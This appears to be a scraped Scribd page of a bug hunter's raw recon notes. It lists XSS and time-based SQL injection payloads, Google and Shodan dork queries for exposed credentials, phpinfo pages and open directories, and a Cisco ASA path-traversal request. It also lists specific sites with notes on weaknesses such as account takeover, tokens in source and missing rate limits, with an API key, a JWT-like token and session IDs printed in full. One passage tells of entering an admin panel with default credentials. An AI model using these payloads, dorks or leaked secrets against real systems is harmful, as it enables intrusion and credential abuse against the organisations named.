0% found this document useful (0 votes)
11 views3 pages

Security Vulnerabilities and Exploits

The document contains a collection of URLs and code snippets that appear to be related to security vulnerabilities and potential exploits across various websites and applications. It includes references to SQL injection, API keys, and methods for bypassing authentication panels. Additionally, it lists interesting domains and resources that may be relevant for reconnaissance in cybersecurity contexts.

Uploaded by

test Co
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
11 views3 pages

Security Vulnerabilities and Exploits

The document contains a collection of URLs and code snippets that appear to be related to security vulnerabilities and potential exploits across various websites and applications. It includes references to SQL injection, API keys, and methods for bypassing authentication panels. Additionally, it lists interesting domains and resources that may be relevant for reconnaissance in cybersecurity contexts.

Uploaded by

test Co
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

>> /ssh:\/\/.*:.*@.*target\.

com/
>> /ftp:\/\/.*:.*@.*target\.com/
site:*.[Link].*
site:*.[Link] inurl:/login
site:*.[Link] ext:php
<svg onload=confirm(cookie)>
(select*from(select(sleep(20)))a)
1)) UNION SELECT sleep(10) -- g

query'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z

*/alert(1)</script><script>/*
"hello<form/><!><details/open/ontoggle=alert(1)>"@[Link]
site:[Link] inurl:url= | inurl:page= | inurl:return= | inurl:next= |
inurl:redir= | inurl:redirect | inurl:page= inurl:& inurl:http

################### #############################################

**RECON
[Link] >> aws
client_id
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link] >> can use two different accounts to access one
account with one password.???
[Link]
>>information disc
[Link] >>> email bypass
[Link]
[Link]
[Link]
site:[Link] | site:[Link] |site:[Link] | site:[Link]
"*.[Link]"
[Link]:"*.[Link]" [Link]:"index of/"
[Link]:"*.[Link]" [Link]:"gitlab/"
[Link]:"phpinfo()" ssl:"*.mckesson.*"
****************************
**[Link]
certsyToken=eyJhbGciOiJBMjU2S1ciLCJlbmMiOiJBMjU2R0NNIiwia2lkIjoiMGVjN2FiY2ItZTg5MS0
0YmQzLTg2MWItOGMxZDg3NTBmMGJmIn0.VmSOfzvTij8ArEDkm0KHAV73_jcU_CzmBWaR_PS2tbDeaKdRDU
gK4g.g3hf7pHD79ceTPEB.XIKYwToql3-0T56h2B1SF3Ucs-aiw7RQ_yVG9Ao0Lp5Q-
RNJCvDnKEyk_uTnhDmsuEf0opdGjHmSAZAgMYqkLknva59WecNOu36XwanDeSMN0GFnHYAwMQwOVjTFS4sH
uQ.P0WqHnRf1aQyEJCYMi4_Aw&returnUrl=https%3A%2F%[Link]%2Foauth
%2Fauthorize%3Fclient_id
%3D0531bfb75a98cd778049762a3a9c1fd32a5b40e6434fef7be701d70448ea805c%26redirect_uri
%3Dhttps%3A%2F%[Link]%2Fcertsy%2Flink%2F%26scope%[Link]%2B
%26response_type%3Dcode >>>> token in URL >> redirect from [Link]

-[Link]
%C3%B4ng%20tin&page_num={ayaa
%22%3E}&session_id=1f4498b9c6f2ebda3cd5dcdf8ef6b15f&search_id=3yAkpixVHSHokFUnNESz-
1f4498b9c6f2ebda3cd5dcdf8ef6b15f-
X86gxLy3TuLx42PSU59a&session_type=web&user_id=3yAkpixVHSHokFUnNESz&logged_user=true
&mobile=false&site_id=1&country=VN&host=https://
[Link]&full_text_only_search=true&ads_per_page=11&callback=_jsonp_0

-[Link]
v2.0/keys
view-source:[Link] >>>>>> api_key
view-source:[Link]
Ah44kMbYNSY0LZ1WUoxZuG5sgHuKKuwOUiwT8hDvCUw >>> api_key
[Link] >>>>> certificate
view-source:[Link]
%[Link] <>>> pwm in source
[Link] >>>>> no rate limite
view-source:[Link] >>token in sorce code
[Link] >>>>>>> wordpress 4.8.1
[Link] >>import
to hunting
[Link]
view-source:[Link] >>>> server 1.1.7
[Link] >>>.. wordpress,cloudfare
[Link]
[Link] >>>>>>>. account takeover
[Link] swigger
[Link] >> access
[Link] >>>>>> [Link]
[Link] >>>>> senstive information in response
[Link] >>>>sql
[Link]
[Link] >>>>>>api/v1 >> jwk
[Link] >>>>>>>>
register
[Link]
[Link] >>>>>>>>>>>>>>
register account
[Link]
[Link] >>>>>>>>>>>import
[Link] >>>>>>>> client id
view-source:[Link]
customerType=ONCL >>> key
[Link] >>>>>>> no rate limit

************************

******bypass admin panel


Now this part was very easy because I thought by using admin : admin or root :
password or administrator : password might work for the default but, I was wrong.
Then I tried for the username and password that was �admin : password� and it
worked.
*************

**********interesting domains:*************
[Link]
[Link]
[Link] >>>>>>>>>>>>>>>>>>cms
[Link] >>>>>>>>>>>>>>>>

[Link] >>>>>>>>>>> wedsocket


[Link]
[Link] >>>>>>>>>>>>>>wordpress 5.5.1
****app:
[Link]://[Link]/#/manageusers/ >>>>>>>>bypass panel
[Link] >>>>>>> import
[Link] >>> import

*************cisco
/+CSCOT+/translation-table?type=mst&textdomain=/2%bCSCOE%2b/portal_inc.lua&default-
language&lang=../

You might also like